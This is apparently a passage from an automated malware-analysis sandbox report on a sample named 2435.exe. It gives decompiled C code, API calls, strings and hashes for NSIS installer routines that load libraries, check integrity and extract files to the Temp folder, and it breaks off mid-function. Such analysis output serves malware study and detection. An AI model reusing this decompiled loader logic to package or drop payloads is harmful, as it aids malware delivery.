0x0040659f
0x004065a2
0x004065a3
0x004065a5
0x004065a7
0x004065aa
0x004065ad
0x004065c3
0x004065c8
0x00406600
0x00406600
0x00406604
0x00406630
0x00406632
0x00406639
0x0040663c
0x0040663f
0x0040663f
0x00406644
0x00406644
0x00406646
0x00406649
0x00406650
0x00406653
0x00406680
0x00406680
0x00406683
0x00406686
0x004066fa
0x004066fa
0x004066fa
0x00000000
0x004066fa
0x00406688
0x0040668e
0x00406691
0x00406694
0x00406697
0x0040669a
0x0040669d
0x004066a0
0x004066a3
0x004066a6
0x004066a9
0x004066c2
0x004066c4
0x004066c7
0x004066c8
0x004066cb
0x004066cd
0x004066d0
0x004066d2
0x004066d4
0x004066d7
0x004066d9
0x004066dc
0x004066e0
0x004066e2
0x004066e2
0x004066e3
0x004066e6
0x004066e9
0x004066ab
0x004066ab
0x004066b3
0x004066b8
0x004066ba
0x004066bd
0x004066bd
0x004066ec
0x004066f3
0x0040667d
0x0040667d
0x0040667d
0x0040667d
0x00000000
0x004066f5
0x00000000
0x004066f5
0x004066f3
0x00406606
0x00406609
0x0040660b
0x0040660e
0x00406611
0x00406614
0x00406616
0x00406619
0x0040661c
0x0040661c
0x0040661f
0x0040661f
0x00406622
0x00406629
0x004065fd
0x004065fd
0x004065fd
0x004065fd
0x00000000
0x0040662b
0x00000000
0x0040662b
0x00406629
0x004065af
0x004065b2
0x004065b4
0x004065b7
0x00000000
0x00000000
0x00000000
0x00000000
0x004064a1
0x004064a1
0x004064a5
0x0040696b
0x00000000
0x0040696b
0x004064ab
0x004064ae
0x004064b1
0x004064b4
0x004064b6
0x004064b6
0x004064b6
0x004064b9
0x004064bc
0x004064bf
0x004064c2
0x004064c5
0x004064c8
0x004064c9
0x004064cb
0x004064cb
0x004064cb
0x004064ce
0x004064d1
0x004064d4
0x004064d7
0x004064d7
0x004064d7
0x004064da
0x00000000
0x00000000
0x0040671e
0x0040671e
0x0040671e
0x00406722
0x00000000
0x00000000
0x00406728
0x0040672b
0x0040672e
0x00406731
0x00406733
0x00406733
0x00406733
0x00406736
0x00406739
0x0040673c
0x0040673f
0x00406742
0x00406745
0x00406746
0x00406748
0x00406748
0x00406748
0x0040674b
0x0040674e
0x00406751
0x00406754
0x00406757
0x0040675b
0x0040675d
0x00406760
0x00000000
0x00406762
0x00000000
0x00406762
0x00406760
0x00406995
0x00000000
0x00000000
0x00405fc4

Memory Dump Source

Source File: 00000000.00000002.235639833.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.235624875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235686951.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235711647.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235739644.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235757684.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235776778.000000000042C000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d33a5f9df5361017a2c2cd63e74982cac3414c6cd2676332625b738f25334a08
Instruction ID: 7fe690cacb8e5da35aefc448adc87e2f65dc6f56ff44dc44b78e187fa59068bd
Opcode Fuzzy Hash: d33a5f9df5361017a2c2cd63e74982cac3414c6cd2676332625b738f25334a08
Instruction Fuzzy Hash: 70F16871D00229CBDF28CFA8C8946ADBBB1FF44305F25816ED856BB281D7785A96CF44

Uniqueness

Uniqueness Score: -1.00%

Function 00405E88, Relevance: 4.5, APIs: 3, Instructions: 20
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405E88(signed int _a4) {
				struct HINSTANCE__* _t5;
				CHAR* _t7;
				signed int _t9;

				_t9 = _a4 << 3;
				_t7 =  *(_t9 + 0x409220);
				_t5 = GetModuleHandleA(_t7);
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t9 + 0x409224));
				}
				_t5 = LoadLibraryA(_t7); // executed
				if(_t5 != 0) {
					goto L2;
				}
				return _t5;
			}

0x00405e90
0x00405e93
0x00405e9a
0x00405ea2
0x00405eaf
0x00000000
0x00405eb6
0x00405ea5
0x00405ead
0x00000000
0x00000000
0x00405ebe

APIs

GetModuleHandleA.KERNEL32(?,?,00000000,0040327F,00000008), ref: 00405E9A
LoadLibraryA.KERNELBASE(?,?,00000000,0040327F,00000008), ref: 00405EA5
GetProcAddress.KERNEL32(00000000,?), ref: 00405EB6

Memory Dump Source

Source File: 00000000.00000002.235639833.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.235624875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235686951.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235711647.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235739644.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235757684.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235776778.000000000042C000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID:
API String ID: 310444273-0
Opcode ID: cda0668070076e7cac62d6abfc32be1e4fdfe709f191786036c768239460f4b3
Instruction ID: 91087f9554edebef2dfdad95906e97f440013226b38390424b9c6ad62026e406
Opcode Fuzzy Hash: cda0668070076e7cac62d6abfc32be1e4fdfe709f191786036c768239460f4b3
Instruction Fuzzy Hash: 0FE08C32A08511BBD3115B30ED0896B77A8EA89B41304083EF959F6290D734EC119BFA

Uniqueness

Uniqueness Score: -1.00%

Function 00405E61, Relevance: 3.0, APIs: 2, Instructions: 14
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405E61(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x4224f0); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x4224f0;
			}

0x00405e6c
0x00405e75
0x00000000
0x00405e82
0x00405e78
0x00000000

APIs

FindFirstFileA.KERNELBASE(?,004224F0,004218A8,0040577D,004218A8,004218A8,00000000,004218A8,004218A8,?,?,7519F560,0040549F,?,"C:\Users\user\Desktop\2435.exe" ,7519F560), ref: 00405E6C
FindClose.KERNEL32(00000000), ref: 00405E78

Memory Dump Source

Source File: 00000000.00000002.235639833.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.235624875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235686951.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235711647.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235739644.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235757684.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235776778.000000000042C000.00000002.00020000.sdmp Download File

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: a0d9290738f1f02d4b3743de2211279f78b4a64d0718c2c828088997ee3199ab
Instruction ID: f2fe444ddfa45285d6a9eb51d657c4c39712a0d2250b7f8498e11f87d01b5aa3
Opcode Fuzzy Hash: a0d9290738f1f02d4b3743de2211279f78b4a64d0718c2c828088997ee3199ab
Instruction Fuzzy Hash: 26D012359495206FC7001738AD0C85B7A58EF553347508B32F969F62E0C7B4AD51DAED

Uniqueness

Uniqueness Score: -1.00%

Function 004036AF, Relevance: 51.0, APIs: 15, Strings: 14, Instructions: 216
stringregistrylibraryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E004036AF() {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				int _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t20;
				void* _t28;
				void* _t30;
				int _t31;
				void* _t34;
				struct HINSTANCE__* _t37;
				int _t38;
				int _t42;
				char _t62;
				CHAR* _t64;
				signed char _t68;
				CHAR* _t79;
				intOrPtr _t81;
				CHAR* _t86;

				_t81 =  *0x423eb0;
				_t20 = E00405E88(6);
				_t88 = _t20;
				if(_t20 == 0) {
					_t79 = 0x4204a0;
					"1033" = 0x7830;
					E00405A4D(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x4204a0, 0);
					__eflags =  *0x4204a0;
					if(__eflags == 0) {
						E00405A4D(0x80000003, ".DEFAULT\\Control Panel\\International",  &M00407302, 0x4204a0, 0);
					}
					lstrcatA("1033", _t79);
				} else {
					E00405AC4("1033",  *_t20() & 0x0000ffff);
				}
				E00403978(_t76, _t88);
				_t85 = "C:\\Users\\alfons\\AppData\\Local\\Temp";
				 *0x423f20 =  *0x423eb8 & 0x00000020;
				 *0x423f3c = 0x10000;
				if(E0040573A(_t88, "C:\\Users\\alfons\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E0040573A(_t96, _t85) == 0) {
						E00405B88(0, _t79, _t81, _t85,  *((intOrPtr*)(_t81 + 0x118)));
					}
					_t28 = LoadImageA( *0x423ea0, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x423688 = _t28;
					if( *((intOrPtr*)(_t81 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t30 = E00403978(_t76, __eflags);
							__eflags =  *0x423f40;
							if( *0x423f40 != 0) {
								_t31 = E00404FD6(_t30, 0);
								__eflags = _t31;
								if(_t31 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42366c;
								if( *0x42366c == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x420478, 5);
							_t37 = LoadLibraryA("RichEd20");
							__eflags = _t37;
							if(_t37 == 0) {
								LoadLibraryA("RichEd32");
							}
							_t86 = "RichEdit20A";
							_t38 = GetClassInfoA(0, _t86, 0x423640);
							__eflags = _t38;
							if(_t38 == 0) {
								GetClassInfoA(0, "RichEdit", 0x423640);
								 *0x423664 = _t86;
								RegisterClassA(0x423640);
							}
							_t42 = DialogBoxParamA( *0x423ea0,  *0x423680 + 0x00000069 & 0x0000ffff, 0, E00403A45, 0);
							E004035FF(E0040140B(5), 1);
							return _t42;
						}
						L22:
						_t34 = 2;
						return _t34;
					} else {
						_t76 =  *0x423ea0;
						 *0x423654 = _t28;
						_v20 = 0x624e5f;
						 *0x423644 = E00401000;
						 *0x423650 =  *0x423ea0;
						 *0x423664 =  &_v20;
						if(RegisterClassA(0x423640) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						_t12 =  &_v16; // 0x624e5f
						SystemParametersInfoA(0x30, 0, _t12, 0);
						 *0x420478 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x423ea0, 0);
						goto L21;
					}
				} else {
					_t76 =  *(_t81 + 0x48);
					if(_t76 == 0) {
						goto L16;
					}
					_t79 = 0x422e40;
					E00405A4D( *((intOrPtr*)(_t81 + 0x44)), _t76,  *((intOrPtr*)(_t81 + 0x4c)) +  *0x423ed8, 0x422e40, 0);
					_t62 =  *0x422e40; // 0x43
					if(_t62 == 0) {
						goto L16;
					}
					if(_t62 == 0x22) {
						_t79 = 0x422e41;
						 *((char*)(E00405684(0x422e41, 0x22))) = 0;
					}
					_t64 = lstrlenA(_t79) + _t79 - 4;
					if(_t64 <= _t79 || lstrcmpiA(_t64, ?str?) != 0) {
						L15:
						E00405B66(_t85, E00405659(_t79));
						goto L16;
					} else {
						_t68 = GetFileAttributesA(_t79);
						if(_t68 == 0xffffffff) {
							L14:
							E004056A0(_t79);
							goto L15;
						}
						_t96 = _t68 & 0x00000010;
						if((_t68 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

0x004036b5
0x004036be
0x004036c5
0x004036c7
0x004036db
0x004036ed
0x004036f7
0x004036fc
0x00403702
0x00403715
0x00403715
0x00403720
0x004036c9
0x004036d4
0x004036d4
0x00403725
0x0040372f
0x00403738
0x0040373d
0x0040374e
0x004037d5
0x004037dd
0x004037e6
0x004037e6
0x004037fc
0x00403802
0x00403810
0x0040389f
0x004038a7
0x004038b1
0x004038b6
0x004038bc
0x00403946
0x0040394b
0x0040394d
0x00403969
0x00000000
0x00403969
0x0040394f
0x00403955
0x0040395d
0x0040395d
0x00000000
0x00403955
0x004038ca
0x004038db
0x004038dd
0x004038df
0x004038e6
0x004038e6
0x004038ee
0x004038f6
0x004038f8
0x004038fa
0x00403903
0x00403906
0x0040390c
0x0040390c
0x0040392b
0x0040393c
0x00000000
0x00403941
0x004038a9
0x004038ab
0x00000000
0x00403816
0x00403816
0x0040381c
0x00403826
0x0040382e
0x00403838
0x0040383e
0x0040384c
0x0040396e
0x0040396e
0x00000000
0x0040396e
0x00403852
0x0040385b
0x0040389a
0x00000000
0x0040389a
0x00403754
0x00403754
0x00403759
0x00000000
0x00000000
0x00403763
0x00403773
0x00403778
0x0040377f
0x00000000
0x00000000
0x00403783
0x00403785
0x00403792
0x00403792
0x0040379a
0x004037a0
0x004037c8
0x004037d0
0x00000000
0x004037b2
0x004037b3
0x004037bc
0x004037c2
0x004037c3
0x00000000
0x004037c3
0x004037be
0x004037c0
0x00000000
0x00000000
0x00000000
0x004037c0
0x004037a0

APIs

Part of subcall function 00405E88: GetModuleHandleA.KERNEL32(?,?,00000000,0040327F,00000008), ref: 00405E9A
Part of subcall function 00405E88: LoadLibraryA.KERNELBASE(?,?,00000000,0040327F,00000008), ref: 00405EA5
Part of subcall function 00405E88: GetProcAddress.KERNEL32(00000000,?), ref: 00405EB6

lstrcatA.KERNEL32(1033,004204A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004204A0,00000000,00000006,"C:\Users\user\Desktop\2435.exe" ,00000000,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403720
lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,004204A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004204A0,00000000,00000006,"C:\Users\user\Desktop\2435.exe" ), ref: 00403795
lstrcmpiA.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,004204A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004204A0,00000000), ref: 004037A8
GetFileAttributesA.KERNEL32(Call), ref: 004037B3
LoadImageA.USER32 ref: 004037FC

Part of subcall function 00405AC4: wsprintfA.USER32 ref: 00405AD1

RegisterClassA.USER32 ref: 00403843
SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 0040385B
CreateWindowExA.USER32 ref: 00403894
ShowWindow.USER32(00000005,00000000), ref: 004038CA
LoadLibraryA.KERNEL32(RichEd20), ref: 004038DB
LoadLibraryA.KERNEL32(RichEd32), ref: 004038E6
GetClassInfoA.USER32 ref: 004038F6
GetClassInfoA.USER32 ref: 00403903
RegisterClassA.USER32 ref: 0040390C
DialogBoxParamA.USER32 ref: 0040392B

Strings

.exe, xrefs: 004037A2
1033, xrefs: 004036CF, 0040371B
RichEdit20A, xrefs: 004038EE, 004038F4
_Nb, xrefs: 00403852, 00403857
C:\Users\user\AppData\Local\Temp\, xrefs: 004036B3
RichEdit, xrefs: 004038FD
"C:\Users\user\Desktop\2435.exe" , xrefs: 004036BB
RichEd20, xrefs: 004038D6
Call, xrefs: 00403763, 0040376B, 00403778, 004037C2, 004037C8
C:\Users\user\AppData\Local\Temp, xrefs: 0040372F, 00403737, 004037CF, 004037D5, 004037E5
.DEFAULT\Control Panel\International, xrefs: 0040370B
Control Panel\Desktop\ResourceLocale, xrefs: 004036E3
@6B, xrefs: 0040380B
RichEd32, xrefs: 004038E1

Memory Dump Source

Source File: 00000000.00000002.235639833.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.235624875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235686951.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235711647.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235739644.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235757684.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235776778.000000000042C000.00000002.00020000.sdmp Download File

Similarity

API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\2435.exe" $.DEFAULT\Control Panel\International$.exe$1033$@6B$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
API String ID: 914957316-759791791
Opcode ID: 6186cd0dc7f5b8c4dd386d80bd90aa2821d034a13263318605b4bd1c267fc880
Instruction ID: 5edcd83abe1923a5ef33726047749e404321c8c293ca1ea02831498dc8d0bb6f
Opcode Fuzzy Hash: 6186cd0dc7f5b8c4dd386d80bd90aa2821d034a13263318605b4bd1c267fc880
Instruction Fuzzy Hash: A961A3B16442007FD720AF659D45E2B3AADEB4475AF40457FF940B22E1D77CAD01CA2E

Uniqueness

Uniqueness Score: -1.00%

Function 00402C72, Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203
memoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00402C72(void* __eflags, signed int _a4) {
				long _v8;
				long _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				char _v300;
				long _t54;
				void* _t57;
				void* _t62;
				intOrPtr _t65;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr _t71;
				long _t82;
				void* _t83;
				signed int _t89;
				intOrPtr _t92;
				void* _t101;
				signed int _t103;
				void* _t105;
				long _t106;
				long _t109;
				void* _t110;

				_v8 = 0;
				_v12 = 0;
				 *0x423eac = GetTickCount() + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\alfons\\Desktop\\2435.exe", 0x400);
				_t105 = E0040583D("C:\\Users\\alfons\\Desktop\\2435.exe", 0x80000000, 3);
				 *0x409014 = _t105;
				if(_t105 == 0xffffffff) {
					return "Error launching installer";
				}
				E00405B66("C:\\Users\\alfons\\Desktop", "C:\\Users\\alfons\\Desktop\\2435.exe");
				E00405B66(0x42b000, E004056A0("C:\\Users\\alfons\\Desktop"));
				_t54 = GetFileSize(_t105, 0);
				 *0x41f050 = _t54;
				_t109 = _t54;
				if(_t54 <= 0) {
					L22:
					E00402BD3(1);
					if( *0x423eb4 == 0) {
						goto L30;
					}
					if(_v12 == 0) {
						L26:
						_t57 = GlobalAlloc(0x40, _v20); // executed
						_t110 = _t57;
						E00405F62(0x40afb8);
						E0040586C( &_v300, "C:\\Users\\alfons\\AppData\\Local\\Temp\\"); // executed
						_t62 = CreateFileA( &_v300, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
						 *0x409018 = _t62;
						if(_t62 != 0xffffffff) {
							_t65 = E004031F1( *0x423eb4 + 0x1c);
							 *0x41f054 = _t65;
							 *0x417048 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t68 = E00402F18(_v16, 0xffffffff, 0, _t110, _v20); // executed
							if(_t68 == _v20) {
								 *0x423eb0 = _t110;
								 *0x423eb8 =  *_t110;
								if((_v40 & 0x00000001) != 0) {
									 *0x423ebc =  *0x423ebc + 1;
								}
								_t45 = _t110 + 0x44; // 0x44
								_t70 = _t45;
								_t101 = 8;
								do {
									_t70 = _t70 - 8;
									 *_t70 =  *_t70 + _t110;
									_t101 = _t101 - 1;
								} while (_t101 != 0);
								_t71 =  *0x417044; // 0x4508f
								 *((intOrPtr*)(_t110 + 0x3c)) = _t71;
								E004057FE(0x423ec0, _t110 + 4, 0x40);
								return 0;
							}
							goto L30;
						}
						return "Error writing temporary file. Make sure your temp folder is valid.";
					}
					E004031F1( *0x417040);
					if(E004031BF( &_a4, 4) == 0 || _v8 != _a4) {
						goto L30;
					} else {
						goto L26;
					}
				} else {
					do {
						_t106 = _t109;
						asm("sbb eax, eax");
						_t82 = ( ~( *0x423eb4) & 0x00007e00) + 0x200;
						if(_t109 >= _t82) {
							_t106 = _t82;
						}
						_t83 = E004031BF(0x417050, _t106); // executed
						if(_t83 == 0) {
							E00402BD3(1);
							L30:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						if( *0x423eb4 != 0) {
							if((_a4 & 0x00000002) == 0) {
								E00402BD3(0);
							}
							goto L19;
						}
						E004057FE( &_v40, 0x417050, 0x1c);
						_t89 = _v40;
						if((_t89 & 0xfffffff0) == 0 && _v36 == 0xdeadbeef && _v24 == 0x74736e49 && _v28 == 0x74666f73 && _v32 == 0x6c6c754e) {
							_a4 = _a4 | _t89;
							_t103 =  *0x417040; // 0x8000
							 *0x423f40 =  *0x423f40 | _a4 & 0x00000002;
							_t92 = _v16;
							 *0x423eb4 = _t103;
							if(_t92 > _t109) {
								goto L30;
							}
							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
								_v12 = _v12 + 1;
								_t109 = _t92 - 4;
								if(_t106 > _t109) {
									_t106 = _t109;
								}
								goto L19;
							} else {
								goto L22;
							}
						}
						L19:
						if(_t109 <  *0x41f050) {
							_v8 = E00405EF4(_v8, 0x417050, _t106);
						}
						 *0x417040 =  *0x417040 + _t106;
						_t109 = _t109 - _t106;
					} while (_t109 > 0);
					goto L22;
				}
			}

0x00402c80
0x00402c83
0x00402c9d
0x00402ca2
0x00402cb5
0x00402cba
0x00402cc0
0x00000000
0x00402cc2
0x00402cd3
0x00402ce4
0x00402ceb
0x00402cf3
0x00402cf8
0x00402cfa
0x00402dea
0x00402dec
0x00402df8
0x00000000
0x00000000
0x00402e01
0x00402e2d
0x00402e32
0x00402e3d
0x00402e3f
0x00402e50
0x00402e6b
0x00402e74
0x00402e79
0x00402e98
0x00402ea8
0x00402eba
0x00402ebf
0x00402ec7
0x00402ed4
0x00402edc
0x00402ee1
0x00402ee3
0x00402ee3
0x00402eeb
0x00402eeb
0x00402eee
0x00402eef
0x00402eef
0x00402ef2
0x00402ef4
0x00402ef4
0x00402ef7
0x00402efe
0x00402f0a
0x00000000
0x00402f0f
0x00000000
0x00402ec7
0x00000000
0x00402e7b
0x00402e09
0x00402e1b
0x00000000
0x00000000
0x00000000
0x00000000
0x00402d00
0x00402d00
0x00402d05
0x00402d09
0x00402d10
0x00402d17
0x00402d19
0x00402d19
0x00402d21
0x00402d28
0x00402e87
0x00402ec9
0x00000000
0x00402ec9
0x00402d34
0x00402db8
0x00402dbb
0x00402dc0
0x00000000
0x00402db8
0x00402d41
0x00402d46
0x00402d4e
0x00402d74
0x00402d7a
0x00402d83
0x00402d89
0x00402d8e
0x00402d94
0x00000000
0x00000000
0x00402d9e
0x00402da6
0x00402da9
0x00402dae
0x00402db0
0x00402db0
0x00000000
0x00000000
0x00000000
0x00000000
0x00402d9e
0x00402dc1
0x00402dc7
0x00402dd7
0x00402dd7
0x00402dda
0x00402de0
0x00402de2
0x00000000
0x00402d00

APIs

GetTickCount.KERNEL32 ref: 00402C86
GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\2435.exe,00000400), ref: 00402CA2

Part of subcall function 0040583D: GetFileAttributesA.KERNELBASE(00000003,00402CB5,C:\Users\user\Desktop\2435.exe,80000000,00000003), ref: 00405841
Part of subcall function 0040583D: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405863

GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\2435.exe,C:\Users\user\Desktop\2435.exe,80000000,00000003), ref: 00402CEB
GlobalAlloc.KERNELBASE(00000040,00409130), ref: 00402E32

Strings

Null, xrefs: 00402D6B
C:\Users\user\Desktop, xrefs: 00402CCD, 00402CD2, 00402CD8
Error launching installer, xrefs: 00402CC2
Inst, xrefs: 00402D59
C:\Users\user\AppData\Local\Temp\, xrefs: 00402C72, 00402E4A
soft, xrefs: 00402D62
"C:\Users\user\Desktop\2435.exe" , xrefs: 00402C7F
C:\Users\user\Desktop\2435.exe, xrefs: 00402C8C, 00402C9B, 00402CAF, 00402CCC
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402EC9
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402E7B

Memory Dump Source

Source File: 00000000.00000002.235639833.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.235624875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235686951.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235711647.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235739644.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235757684.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235776778.000000000042C000.00000002.00020000.sdmp Download File

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: "C:\Users\user\Desktop\2435.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\2435.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
API String ID: 2803837635-317646660
Opcode ID: 60ceed3c27925db81e17521e951e0acb4c8af2ccd94a95ed00efa1934550f9a0
Instruction ID: 0b72a330c31c6d4d52753dad6a5c3012229d4666e6dae103a7747cbc92612fb8
Opcode Fuzzy Hash: 60ceed3c27925db81e17521e951e0acb4c8af2ccd94a95ed00efa1934550f9a0
Instruction Fuzzy Hash: B761E231A40215ABDB20DF64DE49B9E7BB4EB04315F20407BF904B62D2D7BC9E458B9C

Uniqueness

Uniqueness Score: -1.00%

Function 00401734, Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147
stringtimeCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00401734(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				void* _t85;

				_t75 = __ebx;
				_t82 = E004029F6(0x31);
				 *(_t85 - 8) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x24) & 0x00000007;
				_t33 = E004056C6(_t82);
				_push(_t82);
				if(_t33 == 0) {
					lstrcatA(E00405659(E00405B66(0x409b70, "C:\\Users\\alfons\\AppData\\Local\\Temp")), ??);
				} else {
					_push(0x409b70);
					E00405B66();
				}
				E00405DC8(0x409b70);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E00405E61(0x409b70);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x18);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E0040581E(0x409b70);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E0040583D(0x409b70, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 0x34) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E00404F04(0xffffffe2,  *(_t85 - 8));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x423f28;
						goto L32;
					} else {
						E00405B66(0x40a370, 0x424000);
						E00405B66(0x424000, 0x409b70);
						E00405B88(_t75, 0x40a370, 0x409b70, "C:\Users\alfons\AppData\Local\Temp\nsq166.tmp\System.dll",  *((intOrPtr*)(_t85 - 0x10)));
						E00405B66(0x424000, 0x40a370);
						_t62 = E00405427("C:\Users\alfons\AppData\Local\Temp\nsq166.tmp\System.dll",  *(_t85 - 0x24) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x423f28 =  &( *0x423f28->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(0x409b70);
								_push(0xfffffffa);
								E00404F04();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00404F04(0xffffffea,  *(_t85 - 8));
				 *0x423f54 =  *0x423f54 + 1;
				_t43 = E00402F18(_t77,  *((intOrPtr*)(_t85 - 0x1c)),  *(_t85 - 0x34), _t75, _t75); // executed
				 *0x423f54 =  *0x423f54 - 1;
				__eflags =  *(_t85 - 0x18) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x18) != 0xffffffff) {
					L22:
